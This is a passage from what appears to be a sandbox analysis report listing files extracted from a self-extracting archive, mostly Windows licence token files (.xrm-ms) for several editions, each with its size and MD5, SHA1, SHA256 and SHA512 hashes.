e4f69b57907917207972fd5caa818231

SHA1
15f72cc0c21de6a39ee6185551b6e5c3e4b37228

SHA256
173c434b9a41aae5353a9b725e6c63c31b29906a08a12324d7bbe504aadbed8e

SHA512
2cc39ec59d17683b6f17b5b25f5588faa2055dc5944d94866410f0ed748bb900c1b088681df6bc224bdb1c9d4daccbf6e1b06afa64bd8f38e62b7801c7cfdea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\MobilePCMobilityCenter-ppdlic.xrm-ms
Filesize
2KB

MD5
55b8cd78b187fbaabbfac9b7c782d67b

SHA1
4f82671d1ce83ddf276e290e58489f3a7ab4e46d

SHA256
e7c5bd87dd0f5b5760dfc239a92b7d3bf9de2eeda29d87d3a17bb318b4168300

SHA512
35b763d9d76cc7f3b1d286f567bcd7b3030b57fc056cad12d3f8a10480648da5ff68eaa93057d1e6d6d564b31043b5aaaa3dcdfa92b62aec125cd96aff24037e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\NetworkSecurity-ppdlic.xrm-ms
Filesize
2KB

MD5
9481971cd87bdc78d44d3e83a8554ddb

SHA1
ec2eef49ef452cf6d0c5c29680e362ce714fd79f

SHA256
2947d2d577fbbfc08b0aa803c64da29983fad4351c6f9c24859057d574dbb55c

SHA512
1665cf8e62219a00234ad189261d454d12a75582db96150b7cec7d30dbc6f348b3d02c7ba8f46a898eefb6d3583b2647f4809e586f868a7118f49ec557f03eb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PeerToPeerBase-ppdlic.xrm-ms
Filesize
3KB

MD5
9d211b0d0f167dff803e7f3d91faf882

SHA1
ba0b3d1ab7bb8c0e9421549fe576f3d0145c0d9e

SHA256
77d1625cb7e49d7fea84f77800c75d84eff42e51095ad8b947cbbadfd2bdd421

SHA512
a5480b61b4181c1094b34748c9170d1dd2740971aa41a2da395ba609be9706895bbce6740aa0f5a5e35e7e30aaabb5e6818d6d0035a0ed852c7cf573c0032e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\PhotoMinFeature-ppdlic.xrm-ms
Filesize
3KB

MD5
2c29a6d530948477d1b3e2c1fa7e284c

SHA1
90a16d314a050327ea7eb5f36ecf75e9d1cbc2ce

SHA256
73caf41c40168d202625eb50ce40c42bbcd0cd9cd2526f82ed2059a6f0300d68

SHA512
9e5464d57ae66574b9cb070daf34e59cd77652f1abc342f214183864fbafbf08686520408e25b0aa8325daa6b21332fc5425f8ece593a30d9ff3e0616890489f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Localspl-Licensing-ppdlic.xrm-ms
Filesize
2KB

MD5
da8a60a14b7b3d2907cb85f04819677c

SHA1
042c71c67dd3b57232ecef1d10d45486cf16f625

SHA256
352d44c7ebe115034c6901c721d3d6ce9250b1af4d114a6ac7c76c8ae864a8d1

SHA512
33a4ba18e48b957148dd182d11780acce76d137250c591cfa2bcc05d4a3a65e6ea89b829e4ad3299f1db59f53e292a09e6bec83fcf5df72b4d2c9e8611027bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Printing-Spooler-Core-Spoolss-Licensing-ppdlic.xrm-ms
Filesize
3KB

MD5
28d53b28c876f76f3f8d65ba0738ea86

SHA1
8fbf7be305794623bb80f79391485f0fc6cd8532

SHA256
cbd99db274416f8d392c2b4fb06d584a672a14093e1e0f7f8f7ce29edfccec19

SHA512
fae916f8b0b6c19cb814f1efc72d70b166043082ca9ffa6bbd9976aa62bc29b42603fd605c82b4a4623c4b5ff624c5a5586aaf9fc754ded8366d6bdca3ca2d08

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\RasBase-ppdlic.xrm-ms
Filesize
3KB

MD5
d35ede3c39d33b456bb69bf64e84ba0e

SHA1
84826fdb907c0c4df442c427d2d7b2e8c2a236d4

SHA256
8955949921543758dd86948927a29ca3a8f700164e108d9e19c34eefb94dccd7

SHA512
ea8c257e3e656aa9f787208762bc8e8cbc1697dea50e531a84dfa4e4151ec228720169ccee674f57a00dfb0bd9e08481ca43586d2213aa406a602d26a2e2c7bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SLC-Component-SKU-OCUR-ppdlic.xrm-ms
Filesize
2KB

MD5
c74b672815841cb621c81bd6e907148d

SHA1
d511ad8f39e39ae31188b49a6096b238f9c706a3

SHA256
28353c379ff4368566bbe2f03c6f9a89dd4290b5018cb1e535f3aa9c18b971ed

SHA512
ac3ffd58922ee8aca46e17d74ce780a52f24ad9a2488ec4c6d59dd8b75f973927a7b1b89fac8ddab89b2f2914b8d8d8a0192bfc26f897faf2ef9ff0a799bafd0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SMBServer-ppdlic.xrm-ms
Filesize
3KB

MD5
8258842386390b3f224ffc5c95b158f4

SHA1
486248184a475a6a5da323b46d6f4680ea4ffae7

SHA256
da20ecbbed297dad750f83681e5684de7b263c62e2db19772725ac62c76c67ea

SHA512
1e1003c87686331ac48a970b974ced1a5a2ee070238739cd2fd6af142007bfb6610be961220e606c8d15f093129197b6d2b01a71b419653c16e9c8005ee71cae

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\SecureStartupFeature-ppdlic.xrm-ms
Filesize
3KB

MD5
204b8cddf69c7eea0503b5004773f680

SHA1
72a38aed067a95fb25f6d219022d1d523742e84e

SHA256
cb19f9d4cf3951f2b0cef27c8c59501692d2583c3b1dce711b25ec1e4a5f2bbf

SHA512
3910329d65ea8fa2fb0aa9f4224e0ed858ef9a4fc8bad401bea7a077be9cb00d2e80ed4b95da4d82b6de081a03916c4e44aac5b7134b0296a6bc2825240cadfa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-Component-SKU-OCUR-ppdlic.xrm-ms
Filesize
3KB

MD5
0f19b20c683c2345ecaaee07461e1f20

SHA1
f5d35af2f61e92b8003d41a0aee7a7e78b78bb4d

SHA256
ecd1c6eea89c8dcb10991c1653fa30d92e3054a45f0cf0d46f6265e6d6de11c8

SHA512
35329ca8f2879c58c75a504f72cd76d65f8398a9c5639c4fd7f655a912e5aeda84b08fe8e337a5d1bbbd896187c131612f6e8d50e590e8526201d3218a711220

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-UX-ppdlic.xrm-ms
Filesize
2KB

MD5
5f01f3f0e3aee9dcd3b20f25ff47e2b6

SHA1
61e102acb5ee67e208a97d1342ab206fbcc0ce48

SHA256
8b796e4ec3443d3edf1b07ce82aaf185e7a778ec5f9700f110b095fdf98e646b

SHA512
b6af034517f1bac9d18569a852b6fffac2dcd57baf5bf1d62f687476b24d69d72d86be9445c5215459c670315329383d9b58800b4d12bb6b0b2101a9ea4f3895

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\Security-SPP-ppdlic.xrm-ms
Filesize
3KB

MD5
894949e794db63353c8fde78b8d36bd9

SHA1
63a63eaa27eb8aee50dc817af6277ce046400c48

SHA256
dcfd08d3f83d0f39ed3e02d32b172085b9b1a5251e96dfa73619254d17267511

SHA512
6553e732525c4a3cfc283fbf74e90b052ec3d1d7f347dda988705961cd525b9305b9a324dd8e5554978fb5d4e28aa9234bc896fdc159f43cc4e54893919b5dd5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-UIHub-ppdlic.xrm-ms
Filesize
3KB

MD5
20a5db3003e1ca92bbba0cde89aaf9c8

SHA1
2d3540d1551da7f6f34b67cb8b2c231ae3072f66

SHA256
16c941b897beac91a95a5f87246006a0528a48edcb38bdf95ae45a5d69d68d2c

SHA512
f47020bc2ed4cd08818b0dc566a54f2230dd6edfc5c0584a1190e42ac2ee0e6dd7b6d8a4648183430d6d534870334e1235183637254199e19ee7deb93b8b9ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPC-tabbtn-ppdlic.xrm-ms
Filesize
2KB

MD5
1f810139b734d9eeeeaf38830098001d

SHA1
ce81976eab6a5ca23cf0fe2dc9698a7de71100c4

SHA256
e0fe3041abc7f72a6ec701bc37b1fb01bc8ada1cf63f6da083a143a5e1fece11

SHA512
589fc1b7c7d20cc4db6ec37a5bf57dd822a282b889bb755393c334a300272650dc11d6b57086a7ae3409f42cdc85e339a0c133a8da13dfc263821cb39571a385

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TabletPCPlatformInput-core-ppdlic.xrm-ms
Filesize
3KB

MD5
54041a042559f0a5278d47bca29bb0c5

SHA1
2ea883d09377e43f92de80412340d6b64b1fb768

SHA256
ecf0b2cec5bef25e335d6374e18018731e6cc7f40ccac088f2d61f242fe12671

SHA512
e308ac489f5cd43b3bffce776183f9d47fb2d503989ca42e4fc13e6bf87ad27f31cc082c226c16d220007f5d0df375a9fff7df9ecf47577103f467338eb40feb

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-License-ppdlic.xrm-ms
Filesize
4KB

MD5
b35a8385d0c28beadf4837e3f7d668a8

SHA1
ce2d7f9994b5f80d57a63c44d04f4d2cf61bcf21

SHA256
20f7421a9c164087b9455d0e33c19e9baedae6d2e8b8c608579fec645c2cf1f7

SHA512
494a326b2a9a9ac8d68154ebcf072137fc9fdc292748d19945c6ddba4998dec0a565b0a21d8a74752087259ba16b0b638f8caaae2cad1a44a8d8b21703b6c236

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\TerminalServices-RemoteConnectionManager-UiEffects-ppdlic.xrm-ms
Filesize
3KB

MD5
554e4edfb12c4760e1305c451c88d07e

SHA1
506ac0e3ae7de3932bb8d32976f18d2d23d51e03

SHA256
6ab66b179948484415e11abc06bb71fe2a5d79a64f1b07693d17281614d352e7

SHA512
2ab9b8078b250fe9f9ae2db2f7b817a48303dd2332958ef7879aee03cd60884800be98200e21ff276d94f399ff02695ab60a783b707d1a7ec46a7e392a726064

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\VirtualPC-licensing-ppdlic.xrm-ms
Filesize
2KB

MD5
9018beb2601a16dc8631b11e69063cdf

SHA1
8f658b2220ed0dfe2b42a1eacf093e59efa9f61e

SHA256
6f50a8bf5d7bafa50f549a43e20f2399192200e8ca9a18e463655ae2c8700c8d

SHA512
3e985cb799db557c3535a61a5578cf00487253b8b81c8f7abd246af139273aa07ec5467da04a491a53476cd398e69a03e93004d001f40223e396715a39e9abab

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\WMPPlayer-ppdlic.xrm-ms
Filesize
3KB

MD5
4e989ea257726b8756d0a7c891948f2d

SHA1
9727b68a2f044751000afd25a6a8b167c49757c7

SHA256
50ca9cc9d2625f34b29d69fea5d5203948c08cbd0ff4cdb9fb0fb5a073396d5c

SHA512
a7808301ab31ae8e89750a0a9834a5262ca9c1937eee9a37af7c5bc30169bed927afc803ebda8e138b070c10336d9230e22b6166e023c4fd6650cc6e62eecfaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\WindowsSearchComponent-ppdlic.xrm-ms
Filesize
2KB

MD5
f7fd9d94e44f0214fa75d526321092e8

SHA1
bc4816c9aadc4e7581179f71d4a4d088bd45642c

SHA256
a9015d49e457f0d3291061749bf34be5cf0e3ebe319c6c9172bcb92a77057b8c

SHA512
f4605d5be9f77daa41b53aa9058fbc8598e952228eaf68f66ce627b714c781d6c490b5b019b696e1f074032ae71849574cec8d69fb8dde7670574494d25633b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\WorkstationService-ppdlic.xrm-ms
Filesize
2KB

MD5
375e1cb4b6181fcda2ba1d59d016702c

SHA1
51ab370796234693c705b2886c1cea63e812abc0

SHA256
394fb47151909a1b5012effa4e5442ff6263c7c4e11d8f61a8d561babe1d265b

SHA512
2a16d00d11ae2f92f77907cc7f6517ebb78630636dec0341e640fdf819c0e3ffd665b1ebd918741fa56ace7a048fb4a938f9fb1567b97b461b73f56547168f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\appid-ppdlic.xrm-ms
Filesize
2KB

MD5
7097f418d4b83570c9b014fb626572a1

SHA1
5facafd5ac48ba31ce68c64e9d92d9977b427cf5

SHA256
48be90970533b49bb33ac8318ce124268ef92fd8bf828383cc0f359e8cfb5727

SHA512
01607ea00b4daf9c2ad38f300a1482b9d509f4fdf8cb7f24b620d3eb2cd09ab8585437eb0d50d18b313e9f6d795ec58859e7568249284744356963644d77db8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\explorer-ppdlic.xrm-ms
Filesize
2KB

MD5
d653e5080f8f1b158f11a372c4aee9a8

SHA1
21d98aa134df90f33d9dccf5c11646dd94461d7c

SHA256
4d460348ad0f8e43cb32bdf3dfc089233aff2b21e37a91729fbcba0b42b243d2

SHA512
03e7256a24852ed5c3576ee33f540b86c2eecc58d9b443f7520a17b5414e0917ba78fab4dec431bb8f5f0f5f74bfca460c17fc54822889ea429da74b77e7e574

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\feclient-ppdlic.xrm-ms
Filesize
2KB

MD5
68c4a03617e4f26e0c0c9a4b24859e9c

SHA1
76304e5d962d327e8b1dc169ccee871a325911a2

SHA256
36247a9583ef91045c268cc43e6111d901043c977dc0357cbc0c1bce412085c7

SHA512
50928957f3a76ec73c596ac7098a0963fcdd383ebc952ac2d0dc3f7cb508f1cf7e376d74532091cadd57a735e6b3744e593ca0f21557a29371ea6bb8a3c1368f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msac3enc-ppdlic.xrm-ms
Filesize
3KB

MD5
7571b605f7667ea2a9647d79b451254d

SHA1
f839bc40021cf75b67712b563bf73d9f92c98b5b

SHA256
55225242298ec4d5e08444c37c3620188ea9c90712997fa8f100258a2d4fdb40

SHA512
90f999d06b2ce16043f0b66b1980e8352dc464d8fc0eaa0392ff4b0e48460603e53a3275884e12c31bebb3e6496eae079e06271fa0d62d2514d20f0990dec93b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2adec-ppdlic.xrm-ms
Filesize
3KB

MD5
ef60ce48d1f50a99a2791bf1e06e98b5

SHA1
b77a4b9554e1db45300a1ba01388c6ad25fb2f47

SHA256
90eae28514fafb03ed6f2ebe481e87a3c79ed585004d217e942819a749489d4a

SHA512
c7e457a94f04d0bbd33a14df658747fc22a5e86326a8fcc394ccd38f6393a6e4cb72a0ddb515be312c3153cde4af5a9ab3b5723192e6409dad9e77734ea5d1cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2enc-ppdlic.xrm-ms
Filesize
3KB

MD5
cce89cfb399eea5263fb314bbe8c2e04

SHA1
9db136e98df10d89112ca18b824e171d38e1374e

SHA256
6fc870783d0beefec80d7e9e224396c49899dfed97d93687cf41175922c7f6b4

SHA512
4a7e0e9ce787c1f053abcec25840d16f018a4fc1756769c2ff6735c25210c05f79a0bfd3fd720ce6fdd49e91a424e8379b4aaae5821eedc91de60ec947fc1bf1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\msmpeg2vdec-ppdlic.xrm-ms
Filesize
3KB

MD5
2c351b9ceca7dea93b4772a3c3eb152d

SHA1
55deaaf89b7bccd62edc04c79102706757fe6eef

SHA256
b51b85509e4a3da50bc88670f52bf49cdf9266fff27b68d31eb7566eb607bb5c

SHA512
1ddaa89f306ba2f9816d91d7b205eb1f687cc1ace07125946f5b73d3a12300d36b742cfdfc6be46114e5a61e1b82dfe3eabd4053cebd1852882c08899ecb9f3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\parentalcontrols-ppdlic.xrm-ms
Filesize
2KB

MD5
4c2025b14f08d643aa7465dea0470a03

SHA1
e1cbadeab3952878ea6b82b8afc6c7347d951f68

SHA256
dc11df1c1cadbfc49357abbf476128b5652a9f2880242aa27d7bc98890eaaa9e

SHA512
909f37fb9541990a271ff630a63b65a64211191d891ca72482c8f01eae064a215828a59d4f82c715dec2a2b63b6176a532cd91c4bd05d3054e87aedcbed86cd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\provsvc-license-ppdlic.xrm-ms
Filesize
2KB

MD5
57b763f840c415946380224c05303876

SHA1
5fe46b83879a96b0f2e1e9ada9d3a6f9db24de14

SHA256
9d2fd0ad48117aeabab29a185cdea02f149e99429322bd056414ad1230f143b8

SHA512
03145f93f9b34587b39ec4d81f2a067f1e267d1bb6f3f66bff37e42d693c066dddf1e9f3313fa092bf9b823394c40cd45d34e5481ea3eca1e7fa9d5143fdac7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell-homegroup-ppdlic.xrm-ms
Filesize
2KB

MD5
5e8913ab7fbaf4bc9be6012e91911b6f

SHA1
16138d3b92b402a7e425e18a36c88e2cbea265f8

SHA256
97b0d12d1637ec0f8a3e317c1f2a2ce7b766dc4e160882f36db497034824c316

SHA512
c6de263030a767b9ac493d02631c0a8dff7cd4d2a2a964047dafc91e404dd9e1e965295c6f9e3f9eee55227a70f7685d9cdcfc6bc73fa02cda82ed6e367c8f15

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\shell32-license-ppdlic.xrm-ms
Filesize
2KB

MD5
f8e68c039d4391b4ce8c7db9503a5d16

SHA1
46254944b2c36b155f902dbca9bc421c0c933f37

SHA256
2f0202de9a6c1dfd892fef87d3f1a9086e0dc0584166f886078e3b6c5471c48a

SHA512
79925026e0bcd89044ca3e8ca5c89427d244a3ae8f45de74e0f45a0f46f4c6e3322ab71a35b11aa31bc5936c41351834708b69d0360bdfae315aeb7c410a0a70

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomeBasic\tokens\ppdlic\volmgrx-ppdlic.xrm-ms
Filesize
3KB

MD5
730d31131dd455ff8baef77a0a93797d

SHA1
d1b9a4d670446d7e18bdd119d299a36d5d389396

SHA256
45624e0344153ec78f982ff0b53f5a7b2af92f309cea54ec874ccabf6bc4fbcd

SHA512
c20eee34e9bd869bacfe1cbd36c135c014770cbc01e4dd655c41aa1fb1a1f73742243222ddc1dec9595f42dc6339bff6527288ed66aa3ede3b51178e22ca57ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MCLicense-ppdlic.xrm-ms
Filesize
3KB

MD5
7b56436619b89659e398e4a4e1601e29

SHA1
bb63a8630808e7d8dd31a839be1b02889bfb4e53

SHA256
d74444b75681c2a6bf3a96a65a2870c86032127dc0c7595e4817cb86387ccc1c

SHA512
de0459fc8aa339420810da590c1b598d9f9607c996fedc1f3daa0d195e2a45954f8132b052cb3893d2fe4288dd231abfbf16027913569c446e910801f236f0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MathRecognizerEventsLicensing-ppdlic.xrm-ms
Filesize
2KB

MD5
b8c5ae3dc47030cec78d84098e519227

SHA1
e19d21e0226cc18575144080359f10f6167c413e

SHA256
9e4393351a92b6482eab7ddc0f538bbb9ee10b462860dc5b472d6877f83b9351

SHA512
eaceca2d41681f0ce6b9ce24507c38d0d1ef59c6fed8bb81f2274392114a564148e16e0dd9ff93932fb9c96ba1dd987d034cb03100317eef9268a468af3c1196

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\MediaCenter-ppdlic.xrm-ms
Filesize
2KB

MD5
d356fcea82a3b7a937e4375619683434

SHA1
f4ae7b38eaf1ad2b78c5f48695ce6c95f88ceca0

SHA256
14d49431e6c7381f2f3c39c14f6fff88a1f7039113907ceea0fc283d326b3850

SHA512
5cb66b5b1b6b004bd676caa2fd740d671a64325c71dd755f1d444508892782a4f14944aff7afc9068396c37a091ed6877bb472a58f1687bb4ec772c467ef0617

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Microsoft-Windows-AuxiliaryDisplay-ppdlic.xrm-ms
Filesize
3KB

MD5
7102b57189ffc359989cd5c5dd848c0d

SHA1
4a10f1df5284b1d949ddf5a0f9788b76b6cc8f58

SHA256
4b6eb0b0faa90780658301f26a4b4fcc2ad95ff56dc264c13402c430ae13f48f

SHA512
f745461d584535c40442b2ffa31464efcced05b775f2fc91daa03d1a1747f69570dc107746393067a6e362e7d4ac4f1c201d4cb0c6e54cbefe059f5489a69ccd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\OMD-API-ppdlic.xrm-ms
Filesize
2KB

MD5
ca5077b401e98a144924175e0eb753bf

SHA1
bf402dff736c087309f6697a0f4533cc448bbf2e

SHA256
0db143131f70cdbc66abb3ac82909476b172c09fb1fdf02167e85394d845dbd6

SHA512
4ac543c430634ac02c24914761af064222af86eb0e2d5f550088ea15daf6083f4ff6576ad1a11b08eff816280ad969b05574ddda3dc20ab4871d8c10d67fc271

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\Personalization-ppdlic.xrm-ms
Filesize
2KB

MD5
bced4fa9373aa95f46ace2f8330ee266

SHA1
4dec0deea10a2a905c0d7bea0e11951bdedff5c7

SHA256
b1590125dd0e2b97bca4826a28f51772469253ea809bf69afe62830b20ae1f69

SHA512
292777e4e73f71bef1f36e7ed86b4f848d86147addb2ddeb4e5c703110cad849ffcb36dd797c2b1d9e35472fb5ce5882f94c2bf4998a7e6e2e8b9f49a97dba8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\SnippingToolLicensing-ppdlic.xrm-ms
Filesize
2KB

MD5
86e2fb2c0a6236e2189733d2facb2a98

SHA1
1098eee45af4b12b5d35181b22f860c026a3440d

SHA256
af37a6a01bf769051e4ae9e888b903b2a55d5786511b42d6bfc61b1d04d25a84

SHA512
ac1f2c0a7de712d3b989d4fafd9fc2739550454b2f26b2298258a117a5916fe81dffb193899910a4b40dd6ea25d82647feba485dcc3c60dcdca26a4cfb38e34c

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\StickyNotesLicensing-ppdlic.xrm-ms
Filesize
2KB

MD5
d975886ec992bbb6b985f4d5f54a5d8d

SHA1
e99984b91934f95590e15e9a0ca9f4d2f54f7247

SHA256
078e6f340c99aa738cc0d30a4eef148e83b4ff6aa6877b6dcbd78ca6a4352f29

SHA512
cf9283a47714f1ce527266b040a9278cb7c733da102a52d4a4b6c242968d93da803aa795ea8d741d95fa8e8678d5acbc65f3bc83495eabe7bbb081f8b36c7f34

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPC-MathInputLicensing-ppdlic.xrm-ms
Filesize
2KB

MD5
1d02749f5f142a9a00496a7c3dda3231

SHA1
16921994e010243669144cc2938d27d3b707d20b

SHA256
6b0e449d76fde8b8e67510436a794885c8fcf8bae43b57aee2cb612662226f17

SHA512
029b9125173a9d00afe421b7a365f0de5c7b7f581144366a3fb6b1295d8888f3cb35b8ce843f21a4638a99250c4ff1f2e140968d33c755029591928b5019c8dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCAccessories-ppdlic.xrm-ms
Filesize
3KB

MD5
7272640063120b9d540554478464b65c

SHA1
d1ec1f1a1a2e81a365e75c1110bca8a1fbccfe92

SHA256
9c269dc23fc9db6553a4b1fa043194d1392a1c29fc5a46635013140645af9360

SHA512
ab1e447c9cf4acc07134ffeb7e992443c1ef375dcd9d1d7b908278f02c0cef8d42038ff9f08874c52ca6aa75dded4c2b9384e8d12ca942a726f2c2425be4b5f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCCoreInkRecognitionLicensing-ppdlic.xrm-ms
Filesize
2KB

MD5
2f1a66e0ed3b59db9922e65d8bcb211e

SHA1
df70d39269b1ef4fad2e743455325782d2bca41e

SHA256
f8487b9b24b961f526cc12384cea446675f234cba34db13d9146ea7c4352f82f

SHA512
2f12e23acd9220d9270b31399a1fc7aa3c79a0bf4b8d5f2d1c4cc3b0a3cf4fb8c83bfc174d4f69fbbba994a7a0efa70b848a74d6168f1c591dd48245b78290f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPanel-ppdlic.xrm-ms
Filesize
3KB

MD5
64835c36eeb2331b56bfac153f5f6df7

SHA1
024f0d3e93d0563420e7364021606f18691216fd

SHA256
ee19f5dcdd812df8138b6de03a45a37cdc9f39a86f245338b0060c1964d18e14

SHA512
e63cef4c52a9bf8d5ed21b2ca5aeed31a50d9b1d7ef61fdae6bad994ff562ff73966385dee82233271232b5434e12f724135f8f3d21db2734587cb26e92ca1d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\HomePremium\tokens\ppdlic\TabletPCInputPersonalization-ppdlic.xrm-ms
Filesize
2KB

MD5
3664c73e277dd5ca2f8ecfa5dd0f530e

SHA1
effca8435427555f4bf48d15eb5af9f4d5bb0922

SHA256
cff3bad326a43041f8a96aac91fcbf1847336693a6190df5ce681c957e5a4564

SHA512
20a9212194d7eaf2f73abcf030bb493da4f908b1866f9851d319ff5cdd5f9c20a71c52669a91f1d6f8cd6582af7fe750ebfe5edbf66f4336e638e03fe41a92b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\Microsoft-Windows-OfflineFiles-Core-ppdlic.xrm-ms
Filesize
3KB

MD5
21806ab759e66a52e8e6dd8ed1dc3272

SHA1
883af44a404c461d318040a36607cb50f63dbcc1

SHA256
f6a02b2a15d4473dfb7d69c362b2789418876c0322008ef857f039aada5a1c04

SHA512
b0a9d88756d4f11c743853e387a9ace9bd3ad772dcaa30c1f5b1bb41bc93bf6af08037bdc53b29bb2445844937ceb7936e3811edf52a2d568dc5ef8e91589864

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\MobilePCPresentationSettings-ppdlic.xrm-ms
Filesize
2KB

MD5
2ef9022ba4815e9916a2edf6452d7f65

SHA1
2075105dbfe63966124ca50d90197d0df71080b0

SHA256
5851aae51a4caa8c3a78fbe2c8fc0b449cc636852afe5cc387c0bc0df157fb48

SHA512
ddc20af271f933f2f926bfb8154eba8ca6e26bbc537d650d30c5c1809b758263a9a40f10ebe154a2141e1b41b0007db3bdbbcde8fef1b331afdd1ee2bf34ccf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\NetworkProjection-ppdlic.xrm-ms
Filesize
3KB

MD5
bf30e99805d4c77eb9dff61b46e149b3

SHA1
b3e899cea912a5c02179f7a3a93cfc9fd5581ee5

SHA256
3697a8dba337359c9fb2bd9788601cd25dd45f1e92d3ad0e94093d52daed1f5d

SHA512
bbad965c41af9aa535d7a37917d9213047d44a48cdc31dd901a7413b3ae3b53a2e7169f6d1a990c8a03da365534c974ddd0602cfb9e1e70409329fc5344e143e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\data\tokens\Forever\Ultimate\tokens\ppdlic\PeerDist-Common-ppdlic.xrm-ms
Filesize
3KB

MD5
307069cb761e8f9d9702679cfdd03424

